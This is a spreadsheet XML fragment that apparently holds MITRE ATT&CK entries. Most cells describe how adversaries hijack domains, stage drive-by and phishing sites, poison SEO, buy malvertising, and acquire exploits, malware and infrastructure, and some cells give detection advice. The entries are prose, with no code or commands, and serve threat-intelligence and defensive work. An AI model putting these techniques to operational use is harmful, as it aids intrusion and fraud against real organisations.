By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019)  Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)</t>
  </si>
  <si>
    <t>Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
Adversaries who compromise a domain may also engage in domain shadowing by creating malicious subdomains under their control while keeping any existing DNS records. As service will not be disrupted, the malicious subdomains may go unnoticed for long periods of time.(Citation: Palo Alto Unit 42 Domain Shadowing 2022)</t>
  </si>
  <si>
    <t>Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).
Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including:
* Inserting malicious scripts into web pages or other user controllable web content such as forum posts
* Modifying script files served to websites from publicly writeable cloud storage buckets
* Crafting malicious web advertisements and purchasing ad space on a website through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))
In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox)
Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is referred to a strategic web compromise or watering hole attack.
Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).</t>
  </si>
  <si>
    <t>Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>Adversaries may compromise serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them. 
Once compromised, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command &amp; Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)</t>
  </si>
  <si>
    <t>Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
For operations incorporating social engineering, the utilization of a persona on social media may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona  on social media may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. 
Once a persona has been developed an adversary can use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t>Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1)
To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, MEGA, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Establishing cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
Creating [Cloud Accounts](https://attack.mitre.org/techniques/T1585/003) may also require adversaries to establish [Email Accounts](https://attack.mitre.org/techniques/T1585/002) to register with the cloud provider. </t>
  </si>
  <si>
    <t>Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)</t>
  </si>
  <si>
    <t>Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.
Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations.</t>
  </si>
  <si>
    <t>Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
Compromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.</t>
  </si>
  <si>
    <t>Adversaries may create self-signed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develop self-signed code signing certificates for use in operations.</t>
  </si>
  <si>
    <t>Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. 
Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user.
Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed. Adversaries may also use free or paid accounts on Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing) Finally, adversaries may take advantage of the decentralized nature of the InterPlanetary File System (IPFS) to host link targets that are difficult to remove.(Citation: Talos IPFS 2022)</t>
  </si>
  <si>
    <t>Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)</t>
  </si>
  <si>
    <t>Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
In addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel)
An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.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</si>
  <si>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Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
In addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).</t>
  </si>
  <si>
    <t>Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
An adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. [Exploits](https://attack.mitre.org/techniques/T1588/005)) or to attempt to develop one themselves (i.e. [Exploits](https://attack.mitre.org/techniques/T1587/004)).</t>
  </si>
  <si>
    <t>Adversaries may buy and/or steal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purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party.</t>
  </si>
  <si>
    <t>Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems. Digital certificates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securely with its owner. Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it.(Citation: DigiCert Install SSL Cert)
Adversaries may install SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or lending credibility to a credential harvesting site. Installation of digital certificates may take place for a number of server types, including web servers and email servers. 
Adversaries can obtain digital certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) or create self-signed certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1587/003)). Digital certificates can then be installed on adversary controlled infrastructure that may have been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).</t>
  </si>
  <si>
    <t>Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566), or large-scale spam email campaigns. Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).
A variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.(Citation: AnonHBGary)(Citation: Microsoft DEV-0537) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Adversaries may target compromising well-known email accounts or domains from which malicious spam or [Phishing](https://attack.mitre.org/techniques/T1566) emails may evade reputation-based email filtering rules.
Adversaries can use a compromised email account to hijack existing email threads with targets of interest.</t>
  </si>
  <si>
    <t>Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Adversaries may use web servers to support support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations.
Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)</t>
  </si>
  <si>
    <t>Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command &amp; Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)</t>
  </si>
  <si>
    <t>Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
Acquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.(Citation: TrendmicroHideoutsLease)</t>
  </si>
  <si>
    <t>Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.</t>
  </si>
  <si>
    <t>Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
As with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.
Some aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
As with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.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</si>
  <si>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 xml:space="preserve">Adversaries may purchase online advertisements that can be abused to distribute malware to victims. Ads can be purchased to plant as well as favorably position artifacts in specific locations  online, such as prominently placed within search engine results. These ads may make it more difficult for users to distinguish between actual search results and advertisements.(Citation: spamhaus-malvertising) Purchased ads may also target specific audiences using the advertising network’s capabilities, potentially further taking advantage of the trust inherently given to search engines and popular websites. 
Adversaries may purchase ads and other resources to help distribute artifacts containing malicious code to victims. Purchased ads may attempt to impersonate or spoof well-known brands. For example, these spoofed ads may trick victims into clicking the ad which could then send them to a malicious domain that may be a clone of official websites containing trojanized versions of the advertised software.(Citation: Masquerads-Guardio)(Citation: FBI-search) Adversary’s efforts to create malicious domains and purchase advertisements may also be automated at scale to better resist cleanup efforts.(Citation: sentinelone-malvertising) 
Malvertising may be used to support [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), potentially requiring limited interaction from the user if the ad contains code/exploits that infect the target system's web browser.(Citation: BBC-malvertising)
Adversaries may also employ several techniques to evade detection by the advertising network. For example, adversaries may dynamically route ad clicks to send automated crawler/policy enforcer traffic to benign sites while validating potential targets then sending victims referred from real ad clicks to malicious pages. This infection vector may therefore remain hidden from the ad network as well as any visitor not reaching the malicious sites with a valid identifier from clicking on the advertisement.(Citation: Masquerads-Guardio) Other tricks, such as intentional typos to avoid brand reputation monitoring, may also be used to evade automated detection.(Citation: spamhaus-malvertising) </t>
  </si>
  <si>
    <t>Adversaries may create self-signed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In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
Adversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)).
After creating a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.</t>
  </si>
  <si>
    <t>Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
Tools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) Tools can also be staged on web services, such as an adversary controlled GitHub repo, or on Platform-as-a-Service offerings that enable users to easily provision applications.(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Intezer App Service Phishing)
Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool.</t>
  </si>
  <si>
    <t>Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
Malware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin, or hosted on the InterPlanetary File System (IPFS), where decentralized content storage makes the removal of malicious files difficult.(Citation: Volexity Ocean Lotus November 2020)(Citation: Talos IPFS 2022)
Adversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files.</t>
  </si>
  <si>
    <t>Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, SendGrid, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. Additionally, leveraging compromised web-based email services may allow adversaries to leverage the trust associated with legitimate domains.</t>
  </si>
  <si>
    <t>Monitor for unusual login activity from unknown or abnormal locations, especially for privileged accounts (ex: Exchange administrator account).</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to gather local email files. Monitor for unusual processes accessing local email files.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</si>
  <si>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Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)
Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.</t>
  </si>
  <si>
    <t>Monitor &lt;code&gt;HKLM\Software\Policies\Microsoft\Windows NT\DNSClient&lt;/code&gt; for changes to the "EnableMulticast" DWORD value. A value of “0” indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)
Monitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.
Deploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)</t>
  </si>
  <si>
    <t>Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)</t>
  </si>
  <si>
    <t>Monitor network traffic for unusual ARP traffic, gratuitous ARP replies may be suspicious. 
Consider collecting changes to ARP caches across endpoints for signs of ARP poisoning. For example, if multiple IP addresses map to a single MAC address, this could be an indicator that the ARP cache has been poisoned.</t>
  </si>
  <si>
